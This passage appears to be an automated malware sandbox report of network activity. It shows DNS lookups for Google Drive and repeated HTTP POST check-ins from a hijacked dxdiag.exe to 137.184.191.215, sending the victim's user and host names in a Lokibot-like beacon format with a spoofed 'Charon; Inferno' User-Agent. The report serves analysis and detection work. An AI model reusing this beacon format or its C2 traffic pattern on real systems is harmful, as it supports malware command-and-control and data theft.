                              Oct 1, 2024 07:51:15.950314045 CEST6533380192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:15.957814932 CEST8065333137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:16.086544037 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:16.091561079 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:16.091660023 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:16.093961954 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:16.098726034 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:16.098836899 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:16.103565931 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.675030947 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.675051928 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.675062895 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.675153017 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.675205946 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.675230980 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.675434113 CEST6533480192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.680120945 CEST8065334137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.879348040 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.884187937 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.884274006 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.886756897 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.891524076 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:18.891592979 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:18.896502972 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.495783091 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.495805025 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.495820045 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.495836020 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.495904922 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.495938063 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.499943018 CEST6533580192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.504689932 CEST8065335137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.648264885 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.653120995 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.653527975 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.655563116 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.660375118 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:21.660429001 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:21.665216923 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.246186018 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.246217966 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.246257067 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.246268988 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.246491909 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.246762037 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.246848106 CEST6533680192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.251185894 CEST8065336137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.385665894 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.390479088 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.390603065 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.392869949 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.397562981 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:24.397670984 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:24.402368069 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042427063 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042447090 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042459011 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042469978 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042555094 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.042593956 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.042747021 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.042874098 CEST8065337137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.042917013 CEST6533780192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.183201075 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.188069105 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.188251019 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.190448999 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.195303917 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:27.195363998 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:27.200122118 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.856972933 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.856992006 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.857002974 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.857014894 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.857090950 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:29.857126951 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:29.857340097 CEST6533880192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:29.862127066 CEST8065338137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:29.997522116 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:30.002445936 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:30.002563000 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:30.004771948 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:30.009574890 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:30.009648085 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:30.014441013 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.611933947 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.611968994 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.611979961 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.611989975 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.612020016 CEST8065339137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.612077951 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.612077951 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.612303972 CEST6533980192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.764190912 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.769289970 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.769438982 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.771735907 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.776701927 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:32.776794910 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:32.781641006 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.482767105 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.482790947 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.482800961 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.482810020 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.482901096 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.485095024 CEST6534080192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.490127087 CEST8065340137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.634088993 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.638964891 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.639174938 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.641314030 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.646440983 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:35.646524906 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:35.653088093 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.277605057 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.277648926 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.277684927 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.277827978 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.277993917 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.278048038 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.278120995 CEST6534180192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.282852888 CEST8065341137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.415405989 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.420448065 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.420593023 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.422955990 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.427807093 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:38.427886963 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:38.432743073 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101624966 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101651907 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101661921 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101674080 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101686954 CEST8065342137.184.191.215192.168.2.5
                              Oct 1, 2024 07:51:41.101758957 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:41.101814032 CEST6534280192.168.2.5137.184.191.215
                              Oct 1, 2024 07:51:41.102014065 CEST6534280192.168.2.5137.184.191.215
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 1, 2024 07:49:35.707629919 CEST6429353192.168.2.51.1.1.1
                              Oct 1, 2024 07:49:35.714329004 CEST53642931.1.1.1192.168.2.5
                              Oct 1, 2024 07:49:36.756426096 CEST5882553192.168.2.51.1.1.1
                              Oct 1, 2024 07:49:36.763896942 CEST53588251.1.1.1192.168.2.5
                              Oct 1, 2024 07:50:06.528364897 CEST5358138162.159.36.2192.168.2.5
                              Oct 1, 2024 07:50:07.013818979 CEST5590953192.168.2.51.1.1.1
                              Oct 1, 2024 07:50:07.021091938 CEST53559091.1.1.1192.168.2.5
                              Oct 1, 2024 07:50:10.952291965 CEST5622353192.168.2.51.1.1.1
                              Oct 1, 2024 07:50:10.961249113 CEST53562231.1.1.1192.168.2.5
                              Oct 1, 2024 07:50:12.754542112 CEST5163753192.168.2.51.1.1.1
                              Oct 1, 2024 07:50:12.761825085 CEST53516371.1.1.1192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Oct 1, 2024 07:49:35.707629919 CEST192.168.2.51.1.1.10x2d62Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                              Oct 1, 2024 07:49:36.756426096 CEST192.168.2.51.1.1.10x9f82Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                              Oct 1, 2024 07:50:07.013818979 CEST192.168.2.51.1.1.10x7452Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              Oct 1, 2024 07:50:10.952291965 CEST192.168.2.51.1.1.10xd87dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                              Oct 1, 2024 07:50:12.754542112 CEST192.168.2.51.1.1.10x9e0dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Oct 1, 2024 07:49:35.714329004 CEST1.1.1.1192.168.2.50x2d62No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                              Oct 1, 2024 07:49:36.763896942 CEST1.1.1.1192.168.2.50x9f82No error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                              Oct 1, 2024 07:50:07.021091938 CEST1.1.1.1192.168.2.50x7452Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              Oct 1, 2024 07:50:10.961249113 CEST1.1.1.1192.168.2.50xd87dNo error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                              Oct 1, 2024 07:50:12.761825085 CEST1.1.1.1192.168.2.50x9e0dNo error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                              • drive.google.com
                              • drive.usercontent.google.com
                              • 137.184.191.215
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.565313137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:17.168293953 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 180
                              Connection: close
                              Oct 1, 2024 07:50:17.173892021 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: 'ckav.rualfons960781ALFONS-PCk0FDD42EE188E931437F4FBE2CUb5z5
                              Oct 1, 2024 07:50:19.722680092 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:17 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:19.722747087 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:19.722780943 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.565314137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:19.792082071 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 180
                              Connection: close
                              Oct 1, 2024 07:50:19.797177076 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: 'ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2CKHRai
                              Oct 1, 2024 07:50:22.492398024 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:20 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:22.492420912 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:22.492435932 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.565315137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:22.581285000 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:22.586132050 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:25.189577103 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:23 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:25.189601898 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
